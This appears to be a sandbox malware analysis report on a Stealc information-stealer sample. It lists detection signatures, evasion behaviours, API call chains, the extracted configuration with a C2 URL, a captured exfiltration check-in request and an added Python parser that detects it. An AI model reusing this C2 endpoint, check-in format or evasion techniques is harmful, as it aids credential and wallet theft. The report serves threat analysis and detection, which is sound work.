Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559586
MD5: 73da003f0368f871f2bd1b9b2e0ec575
SHA1: 771136fb463501015f73f5cacbec4b5a7c93be18
SHA256: 1f4d60eb730020737ff8fbcbff87fb5227003745d875b6b4965bd5cac4925576
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 73DA003F0368F871F2BD1B9B2E0EC575)
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development drew on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration: {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000001.00000003.2192817969.0000000004D30000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6620 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 6620 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
No Sigma rule has matched
Timestamp: 2024-11-20T17:41:19.739322+0100 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.6 | Source Port: 49723 | Destination IP: 185.215.113.206 | Destination Port: 80 | Protocol: TCP


              AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.php/= | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phplP | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phptop | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpjG | Avira URL Cloud: Label: malware
Source: file.exe.6620.1.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: file.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00394C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00394C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_003B40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003960D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_003960D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_003A6960
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_0039EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00399B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00399B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_003A6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00399B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00399B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00397750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00397750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003A18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A3910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003AE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003AE210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A1269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A1250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003A4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003A4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003A23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0039DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003A2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_003A2390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0039DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0039DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003ACBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003ACBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003AD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_003AD530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003ADD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_003ADD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003916B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_003916B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003916A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_003916A0

              Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49723 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: 185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.206
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /c4becf79229cb002.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----ECGDAAFIIJDAAAAKFHID
  Host: 185.215.113.206
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 39 38 44 36 30 32 30 32 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 2d 2d 0d 0a
  Data Ascii:
    ------ECGDAAFIIJDAAAAKFHID
    Content-Disposition: form-data; name="hwid"

    4498D60202C53528003197
    ------ECGDAAFIIJDAAAAKFHID
    Content-Disposition: form-data; name="build"

    mars
    ------ECGDAAFIIJDAAAAKFHID--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (listed 7 times in the report)
Source: file.exe, 00000001.00000002.2253123340.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/X
Source: file.exe, 00000001.00000002.2253123340.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/=
Source: file.exe, 00000001.00000002.2253123340.0000000000F28000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpjG
Source: file.exe, 00000001.00000002.2253123340.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phplP
Source: file.exe, 00000001.00000002.2253123340.0000000000F83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phptop
Source: file.exe, 00000001.00000002.2253123340.0000000000F6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/u
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00399770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,1_2_00399770
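The POST check-in captured above carries only two multipart fields, hwid and build, the build value being the Botnet value from the extracted configuration, and it is sent without a User-Agent header (the "HTTP GET or POST without a user agent" signature). The following Python is an added example, not code from the report or from Joe Sandbox: it rebuilds the captured request from the header listing and the Data Ascii dump, parses the multipart body, and cross-checks host, path and build against the extracted configuration. The stealc_checkin heuristic (a POST to a .php path, no User-Agent, exactly the fields hwid and build) is an assumption drawn from this single capture, not the logic of ET rule 2044243.

```python
import re
from typing import Dict, Tuple

# Configuration exactly as the report's extractor printed it.
CONFIG = {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

# The POST check-in, reconstructed from the report's header listing and
# "Data Ascii" dump with CRLF line endings as on the wire (211-byte body).
RAW_REQUEST = (
    b"POST /c4becf79229cb002.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----ECGDAAFIIJDAAAAKFHID\r\n"
    b"Host: 185.215.113.206\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------ECGDAAFIIJDAAAAKFHID\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"4498D60202C53528003197\r\n"
    b"------ECGDAAFIIJDAAAAKFHID\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"mars\r\n"
    b"------ECGDAAFIIJDAAAAKFHID--\r\n"
)


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("request has no end-of-headers CRLFCRLF")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> Dict[str, str]:
    """Return the form fields of a multipart/form-data body (RFC 2046 framing)."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary parameter")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields: Dict[str, str] = {}
    for part in body.split(delimiter):
        # The preamble is empty and the epilogue starts with "--" (closing
        # delimiter); every real part starts with the CRLF after the delimiter.
        if not part.startswith(b"\r\n"):
            continue
        part_head, _, value = part[2:].partition(b"\r\n\r\n")
        # The CRLF preceding the next delimiter belongs to the delimiter.
        if value.endswith(b"\r\n"):
            value = value[:-2]
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode("latin-1")] = value.decode("latin-1")
    return fields


def analyze(raw: bytes) -> dict:
    """Parse one request and score it against the report's configuration."""
    method, path, headers, body = parse_request(raw)
    ctype = headers.get("content-type", "")
    fields = parse_multipart(body, ctype) if "multipart/form-data" in ctype else {}
    host = headers.get("host", "")
    # Heuristic assumed from this single capture, not the logic of ET rule
    # 2044243: a POST to a .php path, no User-Agent, exactly hwid and build.
    checkin = (
        method == "POST"
        and path.endswith(".php")
        and "user-agent" not in headers
        and set(fields) == {"hwid", "build"}
    )
    matches_config = (
        host + path == CONFIG["C2 url"] and fields.get("build") == CONFIG["Botnet"]
    )
    return {
        "method": method,
        "host": host,
        "path": path,
        "declared_length": int(headers.get("content-length", "-1")),
        "body_length": len(body),
        "fields": fields,
        "stealc_checkin": checkin,
        "matches_config": matches_config,
    }


if __name__ == "__main__":
    for key, value in analyze(RAW_REQUEST).items():
        print(f"{key}: {value}")
```

The body length recovered from the reconstruction equals the Content-Length the report shows (211), which is a quick sanity check that the transcription is complete; the same parser applied to a pcap extract of other sessions to the same host would show whether later POSTs (the per-file exfiltration the description mentions) reuse the hwid field.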

              System Summary

Source: file.exe | Static PE information: section name: "" (unnamed)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: "" (unnamed)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840
